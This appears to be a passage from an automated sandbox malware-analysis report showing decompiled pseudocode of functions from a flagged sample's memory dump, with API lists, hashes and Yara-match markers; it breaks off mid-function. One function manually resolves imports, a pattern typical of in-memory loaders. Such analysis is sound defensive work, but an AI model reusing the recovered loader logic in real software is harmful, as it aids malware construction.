				void* _t28;
				signed int _t29;

				_t28 = __esi;
				_t27 = __edi;
				_t23 = __ebx;
				_t11 =  *0x443674; // 0x393162b1
				_v8 = _t11 ^ _t29;
				E00426300( &_v72, 0, 0x40);
				E00426300( &_v132, 0, 0x3c);
				_v128 =  &_v72;
				_v132 = 0x3c;
				_v124 = 0x40;
				_t20 = InternetCrackUrlA(__ebx,  *0x446320( &_v132), __ebx, 0x10000000);
				_t21 = _v128;
				if(_t20 == 0) {
					_t21 = "http";
				}
				return E0041DA9B(_t21, _t23, _v8 ^ _t29, _t26, _t27, _t28);
			}















                                                                    0x0040d694
                                                                    0x0040d694
                                                                    0x0040d694
                                                                    0x0040d69d
                                                                    0x0040d6a4
                                                                    0x0040d6af
                                                                    0x0040d6bc
                                                                    0x0040d6c7
                                                                    0x0040d6d4
                                                                    0x0040d6db
                                                                    0x0040d6ea
                                                                    0x0040d6f2
                                                                    0x0040d6f5
                                                                    0x0040d6f7
                                                                    0x0040d6f7
                                                                    0x0040d707

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040D6AF
                                                                    • _memset.LIBCMT ref: 0040D6BC
                                                                    • lstrlen.KERNEL32(00000000,10000000,?), ref: 0040D6E2
                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 0040D6EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memset$CrackInternetlstrlen
                                                                    • String ID: http
                                                                    • API String ID: 3332450456-2541227442
                                                                    • Opcode ID: 1056a3929cd8480c818694b59083ebc0ab15a09be4e179cdb1ef95ad67b8bb3d
                                                                    • Instruction ID: a9c41bcf58f08eebd03907196340c9c098e0e8238ebe52ca876836c33f03ab8c
                                                                    • Opcode Fuzzy Hash: 1056a3929cd8480c818694b59083ebc0ab15a09be4e179cdb1ef95ad67b8bb3d
                                                                    • Instruction Fuzzy Hash: 7901EB70A00248ABDB10DFA5DD45F9D77BCAB05704F91402DF505F7181D774A5088B59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415EF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E00415EF6(void* __eax, void* __eflags) {
				void* __edi;
				void* __esi;
				signed int _t11;
				void* _t14;
				signed int _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				CHAR* _t22;
				void* _t23;

				_t20 = __eax;
				_t22 = E0041DAE4(_t18, __eax, _t21, __eax);
				 *_t22 = 0;
				E0041FD60(GetTickCount());
				_t14 = 0;
				_t25 = _t20;
				if(_t20 > 0) {
					_t14 = _t20;
					do {
						_t11 = E0041FD72(_t25);
						_t17 = 0xa;
						asm("cdq");
						wsprintfA(_t22, "%s%d", _t22, _t11 % _t17);
						_t23 = _t23 + 0x10;
						_t20 = _t20 - 1;
					} while (_t20 != 0);
				}
				 *((char*)(_t14 + _t22)) = 0;
				return _t22;
			}













                                                                    0x00415ef9
                                                                    0x00415f01
                                                                    0x00415f04
                                                                    0x00415f0e
                                                                    0x00415f13
                                                                    0x00415f16
                                                                    0x00415f18
                                                                    0x00415f1a
                                                                    0x00415f1c
                                                                    0x00415f1c
                                                                    0x00415f23
                                                                    0x00415f24
                                                                    0x00415f2f
                                                                    0x00415f35
                                                                    0x00415f38
                                                                    0x00415f38
                                                                    0x00415f1c
                                                                    0x00415f3c
                                                                    0x00415f44

                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 0041FD60: __getptd.LIBCMT ref: 0041FD65
                                                                    • _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 0041FD72: __getptd.LIBCMT ref: 0041FD72
                                                                    • wsprintfA.USER32 ref: 00415F2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
                                                                    • String ID: %s%d
                                                                    • API String ID: 2840978672-1110647743
                                                                    • Opcode ID: 4d7039b94c0342081bf3ce7441a758766c3d5d60c5532e489910ab932e200d9e
                                                                    • Instruction ID: 23ba52ee1f68e2952334585a0200fe4858569359bb45ddc6a97065bd652cc868
                                                                    • Opcode Fuzzy Hash: 4d7039b94c0342081bf3ce7441a758766c3d5d60c5532e489910ab932e200d9e
                                                                    • Instruction Fuzzy Hash: B9E02B72305A506AE61167BDAC85BBB5A5CDFC37B5F24006FF14886242DA9C4C82826E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004146A9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E004146A9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t22 = __edi;
				_t17 = __ebx;
				_push(0);
				E004207D5(E004338FE, __ebx, __edi, __esi);
				_t25 =  *((intOrPtr*)(_t26 + 8));
				 *_t25 = 0x43f30c;
				E0041D5FC(_t25 + 4, __edi, _t27);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t23 = E0041E24D(__ebx, _t21, _t22, _t25, _t27, 4);
				_t28 = _t23;
				if(_t23 == 0) {
					_t23 = 0;
					__eflags = 0;
				} else {
					 *_t23 = E0041D4D4(_t17, _t23, _t25, _t28);
					E0040E094(E0041D293());
				}
				 *((intOrPtr*)(_t25 + 0x38)) = _t23;
				E00414712(_t25);
				return E00420874(_t25);
			}








                                                                    0x004146a9
                                                                    0x004146a9
                                                                    0x004146a9
                                                                    0x004146a9
                                                                    0x004146b0
                                                                    0x004146b5
                                                                    0x004146bb
                                                                    0x004146c1
                                                                    0x004146c6
                                                                    0x004146d1
                                                                    0x004146d4
                                                                    0x004146d6
                                                                    0x004146ed
                                                                    0x004146ed
                                                                    0x004146d8
                                                                    0x004146dd
                                                                    0x004146e6
                                                                    0x004146e6
                                                                    0x004146f1
                                                                    0x004146f4
                                                                    0x00414700

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004146B0
                                                                    • std::_Mutex::_Mutex.LIBCPMT ref: 004146C1
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    • std::locale::_Init.LIBCPMT ref: 004146D8
                                                                      • Part of subcall function 0041D4D4: __EH_prolog3.LIBCMT ref: 0041D4DB
                                                                      • Part of subcall function 0041D4D4: std::_Lockit::_Lockit.LIBCPMT ref: 0041D4F1
                                                                      • Part of subcall function 0041D4D4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041D513
                                                                      • Part of subcall function 0041D4D4: std::locale::_Setgloballocale.LIBCPMT ref: 0041D51D
                                                                      • Part of subcall function 0041D4D4: _Yarn.LIBCPMT ref: 0041D533
                                                                      • Part of subcall function 0041D4D4: std::locale::facet::_Incref.LIBCPMT ref: 0041D540
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 004146E6
                                                                      • Part of subcall function 0040E094: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_std::locale::_$H_prolog3IncrefLockitLockit::_std::locale::facet::_$InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
                                                                    • String ID: xBA
                                                                    • API String ID: 3596770912-1714928763
                                                                    • Opcode ID: 9bd816609df7ddfd60863e44b0b28cc0bc72e95e388cde0d20e8a348159e5d96
                                                                    • Instruction ID: ce15863250ec3f8408497e7952f09512986a565dd23bcd97c0d49abc526cf548
                                                                    • Opcode Fuzzy Hash: 9bd816609df7ddfd60863e44b0b28cc0bc72e95e388cde0d20e8a348159e5d96
                                                                    • Instruction Fuzzy Hash: 49F0E5B9E0021297C704BFB7800239D63D15F9071CF10442FB6519B282DF7CA981874D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00413EC2 Relevance: 7.6, APIs: 5, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E00413EC2(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				void* _t54;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr _t64;
				intOrPtr _t71;
				void* _t89;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				signed int _t108;
				void* _t109;

				_t106 = __esi;
				_push(0x2c);
				E0042083E(E00433C31, __ebx, __edi, __esi);
				_t105 = __ecx;
				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) == 0) {
					L4:
					__eflags =  *(_t105 + 0x54);
					if( *(_t105 + 0x54) != 0) {
						E004145CB(_t105);
						__eflags =  *(_t105 + 0x44);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t109 - 0x18)) = 0xf;
							 *((intOrPtr*)(_t109 - 0x1c)) = 0;
							 *((char*)(_t109 - 0x2c)) = 0;
							 *((intOrPtr*)(_t109 - 4)) = 0;
							_push( *(_t105 + 0x54));
							_t54 = E0041F65A(0, _t105, _t106, __eflags);
							_t83 = 1;
							while(1) {
								_pop(_t89);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								_t107 = _t109 - 0x2c;
								E0040C3CF(_t83, _t89, _t107, _t109, _t54);
								__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
								_t103 =  *((intOrPtr*)(_t109 - 0x2c));
								_t56 = _t103;
								if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
									_t56 = _t107;
									_t103 = _t107;
								}
								_t106 =  *( *(_t105 + 0x44));
								_t83 = _t109 - 0x34;
								_t59 =  *((intOrPtr*)(_t106 + 0x10))(_t105 + 0x4c, _t103, _t56 +  *((intOrPtr*)(_t109 - 0x1c)), _t109 - 0x34, _t109 - 0x2d, _t109 - 0x2c, _t109 - 0x38);
								__eflags = _t59;
								if(_t59 < 0) {
									break;
								} else {
									_t83 = 1;
									__eflags = _t59 - 1;
									if(_t59 <= 1) {
										__eflags =  *((intOrPtr*)(_t109 - 0x38)) - _t109 - 0x2d;
										_t64 =  *((intOrPtr*)(_t109 - 0x2c));
										if( *((intOrPtr*)(_t109 - 0x38)) != _t109 - 0x2d) {
											__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
											if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
												_t64 = _t109 - 0x2c;
											}
											_t108 = _t64 -  *((intOrPtr*)(_t109 - 0x34)) +  *((intOrPtr*)(_t109 - 0x1c));
											while(1) {
												__eflags = _t108;
												if(_t108 <= 0) {
													break;
												}
												_push( *(_t105 + 0x54));
												_t108 = _t108 - 1;
												__eflags = _t108;
												_push( *((char*)(_t108 +  *((intOrPtr*)(_t109 - 0x34)))));
												E0041F1BE(_t83, _t105, _t108, _t108);
											}
											L32:
											_t106 =  *(_t109 - 0x2d) & 0x000000ff;
											L26:
											E00404354(_t109 - 0x2c, 1, 0);
											L3:
											return E00420888(_t83, _t105, _t106);
										}
										__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
										if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
											_t64 = _t109 - 0x2c;
										}
										__eflags =  *((intOrPtr*)(_t109 - 0x34)) - _t64;
										E0040453E(_t109 - 0x2c, 0,  *((intOrPtr*)(_t109 - 0x34)) - _t64);
										L23:
										_push( *(_t105 + 0x54));
										_t54 = E0041F65A(_t83, _t105, _t106, __eflags);
										continue;
									}
									__eflags = _t59 - 3;
									if(_t59 != 3) {
										break;
									}
									__eflags =  *((intOrPtr*)(_t109 - 0x1c)) - 1;
									if(__eflags < 0) {
										goto L23;
									}
									__eflags =  *((intOrPtr*)(_t109 - 0x18)) - 0x10;
									_t71 =  *((intOrPtr*)(_t109 - 0x2c));
									if( *((intOrPtr*)(_t109 - 0x18)) < 0x10) {
										_t71 = _t109 - 0x2c;
									}
									E0041F87F(_t109 - 0x2d, _t83, _t71, _t83);
									goto L32;
								}
							}
							__eflags = _t106;
							goto L26;
						}
						_push( *(_t105 + 0x54));
						_t51 = E0041F65A(0, _t105, _t106, __eflags);
						__eflags = _t51 - 0xffffffff;
						if(_t51 == 0xffffffff) {
							goto L5;
						}
						goto L3;
					}
					L5:
					goto L3;
				}
				_t51 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))))) {
					goto L4;
				}
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
				_t105 =  *((intOrPtr*)(__ecx + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) + 1;
				goto L3;
			}














                                                                    0x00413ec2
                                                                    0x00413ec2
                                                                    0x00413ec9
                                                                    0x00413ece
                                                                    0x00413ed3
                                                                    0x00413ed9
                                                                    0x00413f03
                                                                    0x00413f03
                                                                    0x00413f06
                                                                    0x00413f0f
                                                                    0x00413f14
                                                                    0x00413f17
                                                                    0x00413f2c
                                                                    0x00413f33
                                                                    0x00413f36
                                                                    0x00413f39
                                                                    0x00413f3c
                                                                    0x00413f3f
                                                                    0x00413f46
                                                                    0x00413fe3
                                                                    0x00413fe3
                                                                    0x00413fe4
                                                                    0x00413fe7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413f4d
                                                                    0x00413f50
                                                                    0x00413f55
                                                                    0x00413f59
                                                                    0x00413f5c
                                                                    0x00413f5e
                                                                    0x00413f60
                                                                    0x00413f62
                                                                    0x00413f62
                                                                    0x00413f6a
                                                                    0x00413f78
                                                                    0x00413f82
                                                                    0x00413f85
                                                                    0x00413f87
                                                                    0x00000000
                                                                    0x00413f89
                                                                    0x00413f8b
                                                                    0x00413f8c
                                                                    0x00413f8e
                                                                    0x00413fba
                                                                    0x00413fbd
                                                                    0x00413fc0
                                                                    0x00414003
                                                                    0x00414007
                                                                    0x00414009
                                                                    0x00414009
                                                                    0x00414012
                                                                    0x00414029
                                                                    0x00414029
                                                                    0x0041402b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00414019
                                                                    0x0041401c
                                                                    0x0041401c
                                                                    0x00414021
                                                                    0x00414022
                                                                    0x00414028
                                                                    0x0041402d
                                                                    0x0041402d
                                                                    0x00413ff0
                                                                    0x00413ff7
                                                                    0x00413efd
                                                                    0x00413f02
                                                                    0x00413f02
                                                                    0x00413fc2
                                                                    0x00413fc6
                                                                    0x00413fc8
                                                                    0x00413fc8
                                                                    0x00413fce
                                                                    0x00413fd6
                                                                    0x00413fdb
                                                                    0x00413fdb
                                                                    0x00413fde
                                                                    0x00000000
                                                                    0x00413fde
                                                                    0x00413f90
                                                                    0x00413f93
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413f95
                                                                    0x00413f98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413f9a
                                                                    0x00413f9e
                                                                    0x00413fa1
                                                                    0x00413fa3
                                                                    0x00413fa3
                                                                    0x00413fad
                                                                    0x00000000
                                                                    0x00413fb2
                                                                    0x00413f87
                                                                    0x00413fed
                                                                    0x00000000
                                                                    0x00413fed
                                                                    0x00413f19
                                                                    0x00413f1c
                                                                    0x00413f22
                                                                    0x00413f25
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413f27
                                                                    0x00413f08
                                                                    0x00000000
                                                                    0x00413f08
                                                                    0x00413ee1
                                                                    0x00413ee9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413eee
                                                                    0x00413ef0
                                                                    0x00413ef8
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _fgetc$H_prolog3_Xinvalid_argument_memcpy_sstd::_
                                                                    • String ID:
                                                                    • API String ID: 2343611727-0
                                                                    • Opcode ID: 859c8ba64e4d92bb646eeaa553d6fd81d5bdb03812900f0a166a383031397a8b
                                                                    • Instruction ID: 3f14c8554030ee37678039532fba8f831053acf65d3247fdaa66f77ba3abbdc2
                                                                    • Opcode Fuzzy Hash: 859c8ba64e4d92bb646eeaa553d6fd81d5bdb03812900f0a166a383031397a8b
                                                                    • Instruction Fuzzy Hash: D4519471E00209DFCB10DFA8C8C19EEB7B5FF09315B10452BE511A3691D738EA85CB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403ECC Relevance: 7.6, APIs: 5, Instructions: 102libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E00403ECC(void* __esi) {
				signed short* _v8;
				struct HINSTANCE__* _v12;
				signed short _v16;
				void* __edi;
				intOrPtr _t34;
				intOrPtr _t36;
				signed short _t37;
				signed short _t38;
				intOrPtr _t40;
				signed short _t42;
				CHAR* _t43;
				_Unknown_base(*)()* _t44;
				signed int _t45;
				signed int _t48;
				signed short _t55;
				signed short _t60;
				void* _t64;
				signed short _t67;
				signed short _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				_t70 = __esi;
				_t34 =  *((intOrPtr*)(__esi + 0xc0));
				_t72 = _t71 - 0xc;
				if(_t34 != 0 &&  *((intOrPtr*)(__esi + 0xc4)) != 0) {
					_t55 =  *((intOrPtr*)(__esi + 0x144)) + _t34;
					while(1) {
						_t36 =  *((intOrPtr*)(_t55 + 0xc));
						if(_t36 == 0) {
							goto L24;
						}
						_t37 = LoadLibraryA( *((intOrPtr*)(_t70 + 0x144)) + _t36);
						_v12 = _t37;
						__eflags = _t37;
						if(_t37 == 0) {
							L26:
							_push(6);
							goto L27;
						} else {
							_t38 =  *(_t70 + 0x154);
							__eflags =  *(_t70 + 0x150) - _t38;
							if( *(_t70 + 0x150) < _t38) {
								_t67 = _v16;
								goto L13;
							} else {
								__eflags = _t38;
								if(_t38 == 0) {
									_t45 = 0x10;
								} else {
									_t45 = _t38 + _t38;
								}
								 *(_t70 + 0x154) = _t45;
								_t67 = E0041DAE4(_t64, _t69, _t70, _t45 << 2);
								_v16 = _t67;
								__eflags = _t67;
								if(_t67 == 0) {
									_push(3);
									goto L27;
								} else {
									_t48 =  *(_t70 + 0x150);
									__eflags = _t48;
									if(_t48 != 0) {
										__eflags = _t48 << 2;
										E00420090(_t67,  *(_t70 + 0x14c), _t48 << 2);
										_t72 = _t72 + 0xc;
									}
									E0041DAAA( *(_t70 + 0x14c));
									 *(_t70 + 0x14c) = _t67;
									L13:
									 *((intOrPtr*)(_t67 +  *(_t70 + 0x150) * 4)) = _v12;
									 *(_t70 + 0x150) =  *(_t70 + 0x150) + 1;
									_t40 =  *((intOrPtr*)(_t70 + 0x144));
									_t69 =  *((intOrPtr*)(_t55 + 0x10)) + _t40;
									__eflags =  *(_t55 + 4);
									_v8 = _t69;
									if( *(_t55 + 4) == 0) {
										goto L21;
									} else {
										_t60 =  *_t55;
										__eflags = _t60;
										if(_t60 == 0) {
											_push(8);
											L27:
											_pop(0);
										} else {
											_v8 = _t60 + _t40;
											while(1) {
												L21:
												_t42 =  *_v8;
												__eflags = _t42;
												if(__eflags == 0) {
													break;
												}
												if(__eflags >= 0) {
													_t43 = _t42 +  *((intOrPtr*)(_t70 + 0x144)) + 2;
												} else {
													_t43 = _t42 & 0x0000ffff;
												}
												_t44 = GetProcAddress(_v12, _t43);
												 *_t69 = _t44;
												__eflags = _t44;
												if(_t44 == 0) {
													goto L26;
												} else {
													_v8 =  &(_v8[2]);
													_t69 = _t69 + 4;
													__eflags = _t69;
													continue;
												}
												goto L25;
											}
											_t55 = _t55 + 0x14;
											__eflags = _t55;
											continue;
										}
									}
								}
							}
						}
						goto L25;
					}
					goto L24;
				}
				L25:
				return 0;
			}

























                                                                    0x00403ecc
                                                                    0x00403ecf
                                                                    0x00403ed5
                                                                    0x00403edc
                                                                    0x00403ef5
                                                                    0x00403fe7
                                                                    0x00403fe7
                                                                    0x00403fec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403f05
                                                                    0x00403f0b
                                                                    0x00403f0e
                                                                    0x00403f10
                                                                    0x00403ff8
                                                                    0x00403ff8
                                                                    0x00000000
                                                                    0x00403f16
                                                                    0x00403f16
                                                                    0x00403f1c
                                                                    0x00403f22
                                                                    0x00403f7d
                                                                    0x00000000
                                                                    0x00403f24
                                                                    0x00403f24
                                                                    0x00403f26
                                                                    0x00403f2e
                                                                    0x00403f28
                                                                    0x00403f28
                                                                    0x00403f28
                                                                    0x00403f2f
                                                                    0x00403f3e
                                                                    0x00403f41
                                                                    0x00403f44
                                                                    0x00403f46
                                                                    0x00403ffd
                                                                    0x00000000
                                                                    0x00403f4c
                                                                    0x00403f4c
                                                                    0x00403f52
                                                                    0x00403f54
                                                                    0x00403f56
                                                                    0x00403f61
                                                                    0x00403f66
                                                                    0x00403f66
                                                                    0x00403f6f
                                                                    0x00403f75
                                                                    0x00403f80
                                                                    0x00403f89
                                                                    0x00403f8c
                                                                    0x00403f92
                                                                    0x00403f9b
                                                                    0x00403f9d
                                                                    0x00403fa1
                                                                    0x00403fa4
                                                                    0x00000000
                                                                    0x00403fa6
                                                                    0x00403fa6
                                                                    0x00403fa8
                                                                    0x00403faa
                                                                    0x00404001
                                                                    0x00403ffa
                                                                    0x00403ffa
                                                                    0x00403fac
                                                                    0x00403fae
                                                                    0x00403fdb
                                                                    0x00403fdb
                                                                    0x00403fde
                                                                    0x00403fe0
                                                                    0x00403fe2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403fb3
                                                                    0x00403fc0
                                                                    0x00403fb5
                                                                    0x00403fb5
                                                                    0x00403fb5
                                                                    0x00403fc8
                                                                    0x00403fce
                                                                    0x00403fd0
                                                                    0x00403fd2
                                                                    0x00000000
                                                                    0x00403fd4
                                                                    0x00403fd4
                                                                    0x00403fd8
                                                                    0x00403fd8
                                                                    0x00000000
                                                                    0x00403fd8
                                                                    0x00000000
                                                                    0x00403fd2
                                                                    0x00403fe4
                                                                    0x00403fe4
                                                                    0x00000000
                                                                    0x00403fe4
                                                                    0x00403faa
                                                                    0x00403fa4
                                                                    0x00403f46
                                                                    0x00403f22
                                                                    0x00000000
                                                                    0x00403f10
                                                                    0x00000000
                                                                    0x00403fe7
                                                                    0x00403ff4
                                                                    0x00403ff7

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad_free_malloc_memmove
                                                                    • String ID:
                                                                    • API String ID: 2732542392-0
                                                                    • Opcode ID: 051c01f84066e79673752200a5054dd5dbeda7846905cbe6649358e6d2c8d43e
                                                                    • Instruction ID: 46ab6060c51a40a1c79e3179ae505a5aaa7851d5d7b413b5c03b63ddfb1eae5a
                                                                    • Opcode Fuzzy Hash: 051c01f84066e79673752200a5054dd5dbeda7846905cbe6649358e6d2c8d43e
                                                                    • Instruction Fuzzy Hash: 07313271A00702EFDB21CF68C845BA7BBF9AF44346F14447AE85AE7380D735EA41DA15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042D02C Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E0042D02C(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x445024, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x44568c - _t7;
								if(__eflags == 0) {
									_t9 = E00422147(__eflags);
									 *_t9 = E00422105(GetLastError());
									goto L17;
								} else {
									__eflags = E004235E2(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00422147(__eflags);
										 *_t12 = E00422105(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E004235E2(_t6, _t30);
						 *((intOrPtr*)(E00422147(__eflags))) = 0xc;
						goto L12;
					} else {
						E0041DAAA(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0041DAE4(__edx, __edi, __esi, _a8);
				}
			}









                                                                    0x0042d035
                                                                    0x0042d042
                                                                    0x0042d043
                                                                    0x0042d046
                                                                    0x0042d048
                                                                    0x0042d057
                                                                    0x0042d08a
                                                                    0x0042d08a
                                                                    0x0042d08d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042d05a
                                                                    0x0042d05c
                                                                    0x0042d05e
                                                                    0x0042d05e
                                                                    0x0042d05e
                                                                    0x0042d06b
                                                                    0x0042d071
                                                                    0x0042d073
                                                                    0x0042d075
                                                                    0x0042d0d5
                                                                    0x0042d0d5
                                                                    0x0042d077
                                                                    0x0042d077
                                                                    0x0042d07d
                                                                    0x0042d0bf
                                                                    0x0042d0d3
                                                                    0x00000000
                                                                    0x0042d07f
                                                                    0x0042d086
                                                                    0x0042d088
                                                                    0x0042d0a7
                                                                    0x0042d0bb
                                                                    0x0042d0a1
                                                                    0x0042d0a1
                                                                    0x0042d0a1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042d088
                                                                    0x0042d07d
                                                                    0x00000000
                                                                    0x0042d0a3
                                                                    0x0042d090
                                                                    0x0042d09b
                                                                    0x00000000
                                                                    0x0042d04a
                                                                    0x0042d04d
                                                                    0x0042d053
                                                                    0x0042d053
                                                                    0x0042d0a4
                                                                    0x0042d0a6
                                                                    0x0042d037
                                                                    0x0042d041
                                                                    0x0042d041

                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0042D03A
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • _free.LIBCMT ref: 0042D04D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 1020059152-0
                                                                    • Opcode ID: 1ad92e8f709057c87a4a1958a32fad082944bfe4aedf51acdc71a3099711d208
                                                                    • Instruction ID: 52f07516f93ad42c093f850dc285075b678ee9902cea612d048988dfe94a3330
                                                                    • Opcode Fuzzy Hash: 1ad92e8f709057c87a4a1958a32fad082944bfe4aedf51acdc71a3099711d208
                                                                    • Instruction Fuzzy Hash: C311B932F045306BCB213F75BC04A9A37A4AF453A8F61442BFD4986161DA7C8842C69C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00425CDC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E00425CDC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
